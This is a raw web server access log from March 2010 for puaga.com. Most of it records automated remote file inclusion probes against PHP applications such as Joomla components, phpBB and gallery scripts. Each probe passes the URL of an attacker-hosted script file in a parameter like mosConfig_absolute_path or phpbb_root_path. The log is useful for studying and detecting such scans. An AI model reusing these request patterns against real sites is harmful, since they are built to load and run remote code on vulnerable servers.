218.208.78.90 - - [03/Mar/2010:04:26:12 -0800] "GET /logs/access_100214.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:04:27:33 -0800] "GET /logs/access_100126.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:04:27:33 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:04:27:33 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:04:27:33 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:04:27:33 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:04:27:33 -0800] "GET /logs/access_100126.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:04:28:05 -0800] "GET /logs/access_100126.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:04:28:05 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:04:28:05 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [03/Mar/2010:04:28:47 -0800] "GET /logs/access_100214.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:28:57 -0800] "GET /logs/access_100205.log%20%20////admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:28:57 -0800] "GET /logs////admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:28:57 -0800] "GET ///admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:29:00 -0800] "GET /logs/access_100205.log%20%20////admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:29:00 -0800] "GET ///admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:29:01 -0800] "GET /logs////admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:29:32 -0800] "GET ///admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:29:32 -0800] "GET /logs/access_100217.log%20%20////admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:29:32 -0800] "GET /logs////admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.210.178 - - [03/Mar/2010:04:29:38 -0800] "GET /logs/access_100126.log%20%20//modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.xperthelp.net/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.210.178 - - [03/Mar/2010:04:29:38 -0800] "GET /modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.xperthelp.net/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.210.178 - - [03/Mar/2010:04:29:38 -0800] "GET /logs//modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.xperthelp.net/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:29:47 -0800] "GET /logs/access_100203.log%20%20////admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:30:10 -0800] "GET ///admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:30:10 -0800] "GET /logs////admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:30:10 -0800] "GET /logs/access_100217.log%20%20////admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.210.178 - - [03/Mar/2010:04:30:18 -0800] "GET /logs/access_100207.log%20%20//modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.xperthelp.net/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:04:30:24 -0800] "GET /logs/access_100203.log%20%20////admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.210.178 - - [03/Mar/2010:04:30:57 -0800] "GET /modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.xperthelp.net/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.210.178 - - [03/Mar/2010:04:30:57 -0800] "GET /logs//modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.xperthelp.net/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.210.178 - - [03/Mar/2010:04:30:57 -0800] "GET /logs/access_100126.log//modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.xperthelp.net/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.210.178 - - [03/Mar/2010:04:31:06 -0800] "GET /logs/access_100207.log//modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.xperthelp.net/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.210.178 - - [03/Mar/2010:04:31:11 -0800] "GET /logs/access_100126.log//modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.xperthelp.net/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.210.178 - - [03/Mar/2010:04:31:11 -0800] "GET /modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.xperthelp.net/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.210.178 - - [03/Mar/2010:04:31:11 -0800] "GET /logs//modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.xperthelp.net/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.210.178 - - [03/Mar/2010:04:31:25 -0800] "GET /logs/access_100207.log//modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://www.xperthelp.net/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [03/Mar/2010:04:31:26 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 404 5258 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.puaga.com"
222.122.25.99 - - [03/Mar/2010:04:31:27 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 200 3642 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:04:32:21 -0800] "GET /logs/access_100219.log%20%20//upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:04:32:21 -0800] "GET /upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:04:32:21 -0800] "GET /logs//upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:32:22 -0800] "GET /logs/access_100222.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:04:33:09 -0800] "GET /logs/access_100225.log%20%20//upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:04:33:18 -0800] "GET /upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:04:33:18 -0800] "GET /logs/access_100219.log%20%20//upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:04:33:18 -0800] "GET /logs//upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:04:34:04 -0800] "GET /logs/access_100225.log%20%20//upgrade_album.php?GALLERY_BASEDIR=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:04:34:45 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:04:34:46 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:04:35:19 -0800] "GET /port.php?content=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:04:35:19 -0800] "GET /logs/access.log/port.php?content=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:04:35:19 -0800] "GET /logs/port.php?content=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:04:37:49 -0800] "GET /logs/access.log/port.php?content=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:04:37:49 -0800] "GET /port.php?content=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:04:37:49 -0800] "GET /logs/port.php?content=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:04:38:23 -0800] "GET /logs/port.php?content=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:04:38:23 -0800] "GET /port.php?content=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:04:38:23 -0800] "GET /logs/access.log/port.php?content=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:04:40:36 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:04:40:37 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
87.250.255.242 - - [03/Mar/2010:04:41:42 -0800] "GET /logs/access_100106.log HTTP/1.1" 404 5258 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
218.208.78.90 - - [03/Mar/2010:04:42:06 -0800] "GET /logs/access_100214.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:04:43:50 -0800] "GET /bbs/skin/ggambo5100_gallery//setup.php?setup[use_category]=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:04:43:50 -0800] "GET /logs//bbs/skin/ggambo5100_gallery//setup.php?setup[use_category]=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:04:43:50 -0800] "GET /logs/access_100126.log//bbs/skin/ggambo5100_gallery//setup.php?setup[use_category]=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:45:32 -0800] "GET /logs/access_100217.log%20%20////admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:45:32 -0800] "GET ///admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:45:32 -0800] "GET /logs////admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:45:33 -0800] "GET /com//accounts/inc/include.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:45:33 -0800] "GET /logs/access_100128.log/com//accounts/inc/include.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:45:33 -0800] "GET /logs/com//accounts/inc/include.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:45:34 -0800] "GET /com//accounts/inc/include.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:45:34 -0800] "GET /logs/com//accounts/inc/include.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:45:34 -0800] "GET /logs/access_100128.log%20%20/com//accounts/inc/include.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:45:37 -0800] "GET /logs/com//accounts/inc/include.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:45:37 -0800] "GET /logs/access_100128.log%20%20/com//accounts/inc/include.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:45:37 -0800] "GET /com//accounts/inc/include.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:45:38 -0800] "GET /logs/com//accounts/inc/include.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:45:38 -0800] "GET /com//accounts/inc/include.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:45:38 -0800] "GET /logs/access_100128.log/com//accounts/inc/include.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:45:48 -0800] "GET /logs/access_100203.log%20%20////admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:04:47:51 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:04:47:51 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:04:47:51 -0800] "GET /logs/access_100126.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:04:47:55 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:48:15 -0800] "GET /logs/access_100217.log%20%20////admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:48:15 -0800] "GET ///admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:48:15 -0800] "GET /logs////admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.119 - - [03/Mar/2010:04:48:24 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.119 - - [03/Mar/2010:04:48:24 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.119 - - [03/Mar/2010:04:48:24 -0800] "GET /logs/access_100217.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.119 - - [03/Mar/2010:04:48:26 -0800] "GET /logs/access_100217.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.119 - - [03/Mar/2010:04:48:27 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.119 - - [03/Mar/2010:04:48:27 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:04:48:29 -0800] "GET /logs/access_100203.log%20%20////admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.119 - - [03/Mar/2010:04:49:08 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.119 - - [03/Mar/2010:04:49:08 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.119 - - [03/Mar/2010:04:49:08 -0800] "GET /logs/access_100217.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:49:24 -0800] "GET /logs//guestbook1//admin.php?include_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:49:24 -0800] "GET /guestbook1//admin.php?include_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:49:25 -0800] "GET /logs/access_100126.log%20%20//guestbook1//admin.php?include_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:04:49:32 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:04:49:32 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:04:49:32 -0800] "GET /logs/access_100126.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:04:49:38 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:04:49:38 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:04:49:39 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:49:53 -0800] "GET /guestbook1//admin.php?include_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:49:53 -0800] "GET /logs//guestbook1//admin.php?include_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:49:53 -0800] "GET /logs/access_100126.log%20%20//guestbook1//admin.php?include_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [03/Mar/2010:04:49:56 -0800] "GET /logs/access_100217.log%20%20//guestbook1//admin.php?include_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:04:50:07 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:04:50:07 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:04:50:07 -0800] "GET /logs/access_100208.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:04:50:18 -0800] "GET /logs/access_100129.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
